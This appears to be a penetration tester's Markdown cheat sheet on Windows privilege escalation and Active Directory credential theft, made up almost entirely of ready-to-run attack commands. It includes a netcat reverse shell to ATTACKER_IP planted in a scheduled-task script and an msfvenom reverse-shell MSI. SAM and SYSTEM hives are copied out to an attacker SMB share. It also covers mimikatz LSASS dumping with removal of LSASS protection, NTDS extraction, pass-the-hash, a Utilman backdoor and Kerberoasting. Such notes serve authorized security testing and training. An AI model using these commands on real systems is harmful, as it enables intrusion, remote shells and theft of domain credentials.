# Windows Privilege Escalation ## Links * [Fundamentals](https://www.fuzzysecurity.com/tutorials/16.html) * [PowerShellEmpire](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp) * [JAWS](https://github.com/411Hall/JAWS) * [winpeas](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS) * [privescheck](https://github.com/itm4n/PrivescCheck) * [windows exploit suggester](https://github.com/bitsadmin/wesng) * [hacktricks](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation) ## Account Types * __Administrator__ local & domain * __Standard__ local & domain * __Guest__ * __System__, local system, final escalation * __Local Service__, got anonymous connections over network. * __Network Service__, default service account, authentication via network ## Enumeration ### Users & Groups ```sh whoami /priv net users net users net localgroup net localgroup query session qwinsta ``` ### Files * [powershell](../../../../enumeration/windows/powershell.md) ### System ```sh hostname systeminfo | findstr /B /C:"OS Name" /C:"OS Version" ``` * Installed software, check for existing exploits ```sh wmic product get name,version,vendor ``` * Services ```sh wmic service list brief | findstr "Running" ``` ### Logfiles and Registry ```sh cmdkey /list ``` * Keys containing passwords ``` reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s ``` ### AD Credentials * Check AD's NTDS (configuration database), SYSVOL (policy distribution through the domain) ```sh Get-ADUser -Filter * -Properties * | select Name,SamAccountName,Description ``` #### NTDS * Check user description of AD users * NTDS consists of three tables * Schema * Link * Data type * Located under `C:\Windows\NTDS` * File is locked by AD at runtime * A System Bootkey is need to dump the NTDS ## Exploit * __Use found credentials__ ```sh runas /savecred /user: reverse_shell.exe ``` ### DLL Hijacking * [DLL hijacking](../../../../exploit/windows/dll_hijacking/dll_hijacking.md) ### Unquoted Service Path * [unquoted service path](../../../../exploit/windows/docs/unquoted_path.md) ### Token Impersonation * `SeImpersonatePrivilege` is necessary, check via `whoami priv` * Hot Potato is best before Server 2019 and Windows 10 (version 1809) * [Potatos](../../../../exploit/windows/docs/potatoes.md) * [itm4n](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) ### Schedules Tasks * `schtasks` and `schtasks /query /tn %TASK_NAME% /fo list /v` * `Autoruns64.exe` ### MSI Elevated Installer * [Always install elevated](../../../../exploit/windows/docs/always_installed_elevated.md) ### accesschk64 Permissions * Check access to files and folders ```sh accesschk64 -wvu "file.exe" ``` * If permission `SERVICE_CHANGE_CONFIG` is set ```sh sc config binpath="net localgroup administrators user /add" ``` * [Service escalation](../../../../exploit/windows/service_escalation/service_escalation.md) * Any other binary works as well. Copy the compiled portable executable from the `service_escalation` onto the binary path.Restart the service afterwards. #### accesschk64 for Services ```sh accesschk64 -qlc "service.exe" ``` * If permission `SERVICE_ALL_ACCESS` is set it is configurable upload a reverse shell ```sh icacls C:\Windows\Temp\shell.exe /grant Everyone:F ``` * Reconfigure and restart service ```sh sc config TheService binPath= "C:\Path\to\shell.exe" obj= LocalSystem sc stop TheService sc start TheService ``` ### Startup Application * Put reverse shell instead of an executable inside `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup` ### Password Mining * Set up metasploit ```sh use auxiliary/server/capture/http_basic set srvport 7777 set uripath pass ``` * Visit site on target ### Unattended Windows Installation * Investigate the following paths to potentially find user credentials ```sh C:\Unattend.xml C:\Windows\Panther\Unattend.xml C:\Windows\Panther\Unattend\Unattend.xml C:\Windows\system32\sysprep.inf C:\Windows\system32\sysprep\sysprep.xml ``` * Watch out for the `` tags ### Powershell History file ```sh Get-Content %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt ``` ### Internet Information Services (IIS) * Default web server on windows * Paths containing credentials are the following ```sh C:\inetpub\wwwroot\web.config C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config ``` ### Putty * Saved proxy password credentials may be found via ```sh reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "ProxyPassword" /s ``` ### schtask and icacls * Check `schtasks /query /tn %TASK_NAME% /fo list /v` * Check script for scheduled tasks, `F` means full access ```sh icacls ``` * Put payload inside the script ```sh echo "C:\tmp\nc.exe -e cmd.exe %ATTACKER_IP% 4711" > ``` * Run the task ```sh schtasks /run /tn ``` ### Always Installs Elevated * These should be set ```sh C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer ``` * Craft `*.msi` file with a payload ```sh msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f msi -o wizard.msi ``` * Upload and execute via ```sh msiexec /quiet /qn /i C:\Windows\Temp\wizard.msi ``` ### Service Misconfiguration * Check services, watch out for `BINARY_PATH_NAME` and `SERVICE_START_NAME` ```sh sc qc apphostsvc ``` * Check found permissions via ```sh icacls ``` * If the service binary path is writeable move the payload to its path and grant permissions ```sh icacls /grant Everyone:F ``` ```sh sc stop sc start ``` * Catch the reverse shell service Others ways are: * Discretionary Access Control (DACL) can be opened via right click on the service and go to properties * All services are stored under `HKLM\SYSTEM\CurrentControlSet\Services\` ### Unquoted Service Path * If `BINARY_PATH_NAME` spaces are escaped incorrectly. Its path will be resolved to every space from left to right. If there is a binary with a matching name inside the directory it will be started. * A created directory at install time inherits the permissions from its parent. Check it via ```sh icacls ``` * Use `service-exe` payload in msfvenom upload the payload and move it on the path with the a fitting parital name of the service path * Set permissions ```sh icacls C:\Path/to/service.exe /grant Everyone:F ``` ### Permissions * [priv2admin](https://github.com/gtworek/Priv2Admin) * `whoami /priv` #### SeBackup / Restore * If `SeBackup / SeRestore` (rw on all files) is set an elevated `cmd.exe` may be opened * Download `SAM` and `System` hashes ```sh reg save hklm\system C:\Windows\Temp\system.hive reg save hklm\sam C:\Windows\Temp\sam.hive ``` * or ```sh copy C:\Windows\System32\config\sam \\ATTACKER_IP\ ``` * Start smb server on attack machine ```sh copy C:\Windows\Temp\sam.hive \\ATTACKER_IP\ copy C:\Windows\Temp\system.hive \\ATTACKER_IP\ ``` * Dump the hashes ```sh secretsdump.py -sam sam.hive -system system.hive LOCAL ``` * or meterpreter on target ```sh hashdump ``` * Use pass the hash to login ```sh psexec.py -hashes administrator@$TARGET_IP ``` #### SeTakeOwnership * If `SeTakeOwnership` is set one can take ownership of every file or service. ```sh takeown /f C:\Windows\System32\Utilman.exe icacls C:\Windows\System32\Utilman.exe /grant :F copy cmd.exe utilman.exe ``` * Log out, on the Login screen click on `Ease of Access` #### SeImpersonate / SeAssignPrimaryToken * It is a rouge potato * Execute process as another user * Service accounts operate through impersonation * Check privileges via `whoami /priv` for these * __Object Exporter Identifier (OXID)__ is executed as via DCOM as a resolver on port 135 to socket of attacker ```sh socat tcp-listen:135 reuseaddr,fork tcp:$TARGET_IP:1234 ``` * Catch the potatoe executable from target via netcat ### Volume Shadow Copy Service * Take a look at the volumes at ```sh vssadmin list shadows ``` * Copy `sam` and `system` from the shadow copy ```sh copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam \\ATTACKER_IP\ copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system \\ATTACKER_IP\ ``` ### Dump LSASS * If administrator permissions are gained, a dump file can be created by opening the task manager and right clicking `lsass.exe` -> `creat dumpfile` * Use `procdump.exe` from sysinternal suite as an alternative to `tskmgr.exe` * Extract the dump via mimikatz ```sh privilege::debug sekurlsa::logonpasswords ``` ### LSASS Protection __The bypass is needed most of the time in order to dump passwords__ * If the dump cannot be created because it is protected change `RunAsPPL` DWORD to `0` under ```sh HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa ``` * Alternatively, use mimikatz ```sh privilege::debug !+ !processprotect /process:lsass.exe /remove ``` * `+!` calls `mimidrv.sys`, __therefore mimikatz has to be executed inside the same directory the this file lies__ ### Windows Credential Manager * Can be found via `Control Pane` -> `User Accounts` -> `Credential Manager` * Alternatively, command line can be used ```sh vaultcmd /list vaultcmd /listproperties:"Web Credentials" vaultcmd /listcreds:"web credentials" ``` * Extract the password via powershell script [Get-WebCredentials from nishang](https://github.com/samratashok/nishang/blob/master/Gather/Get-WebCredentials.ps1) ```sh powershell -ex bypass Get-WebCredentials ``` * Via mimikatz if administrative permissions have been gained ```sh privilege::debug sekurlsa::credman ``` ### Ntdsutil * If administrative permissions on the DC have been gained this can be done * Used to maintain the AD database, delete objects, snapshotting, set Directory Service Restore Mode (DSRM) #### Locally extracting ntds.dit * This can be done to gather the system boot key * No AD credentials are needed * Three files are needed * C:\Windows\NTDS\ntds.dit * C:\Windows\System32\config\SYSTEM * C:\Windows\System32\config\SECURITY * Locally dumping all three needed file is done via ```sh powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full C:\Windows\Temp\ntds' q q" ``` * Use `secretsdump` to extract `ntds.dit` ```sh secretsdump.py -security ./SECURITY -system ./SYSTEM -ntds ./ntds.dit local ``` #### Remotely dumping ntds * Needs the following AD credentials * Replicating Directory Changes * Replicating Directory Changes All * Replicating Directory Changes in Filtered Set * Mimikatz or impacket can be used to gain credentials * Impacket's secretsdump.py via ```sh secretsdump.py -just-dc /@$DC_IP secretsdump.py -just-dc-ntlm /@$DC_IP ``` ### Local Administration Password Solution (LAPS) * This is possible if the user which credentials we posses is member of the group to make password changes * Replaces GPP, see below * There are two interesting attributes * __ms-mcs-AdmPwd__ contains plain text password of the local Administrator * __ms-mcs-AdmPwdExpirationTime__ contains the expiration date of the admin password * __admpwd.dll__ is used to update the password inside __ms-mcs-AdmPwd__ * If LAPS is enabled the dll can be found in `C:\Program Files\LAPS\CSE` * List the cmdlets for LAPS ```sh Get-Command *AdmPwd* ``` * Find the Organisational Unit with extended rights and take a look at the group under `ExtendedRightsHolder` in the output ```sh Find-AdmPwdExtendedRights -Identity ``` * Enumerate which hosts have LAPS enabled * Impersonate the user and execute the following which displays the password ```sh Get-AdmPwdPassword -ComputerName ``` * Use the property name displayed under `ExtendedRightsHolder` to enumerate groups and their users ```sh net groups net user ``` #### Group Policy Preferences * Provisions administrational groups through the domain via SYSVOL * Distribution is done through XML files on SYSVOL. These contain a password encrypted with [the published private key](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-gppref/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be?redirectedfrom=MSDN) * Use [Powersploit's Get-GPPPassword](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1) to decrypt it ### Kerberoasting * Inital (low level) credentials are needed * __Service Principal Name (SPN)__ account must be known, e.g. from web IIS user or SQL users ```sh GetUserSPNs.py -dc-ip $DC_IP / ``` * Take a look at `Name` in the output and use it to query a TGS ticket ```sh GetUserSPNs.py -dc-ip $DC_IP / -request-user ``` * Crack the kerberos hash ```sh hashcat -m 13100 -a0 hash.txt --wordlist ``` ### AS-REP Roasting * `Do not require Kerberos pre-authentication` must be set on the AD user's account login settings. A password is used instead * A list of potential users with this configured setting should be gathered ```sh GetNPUsers.py -dc-ip $DC_IP / -usersfile users.txt ```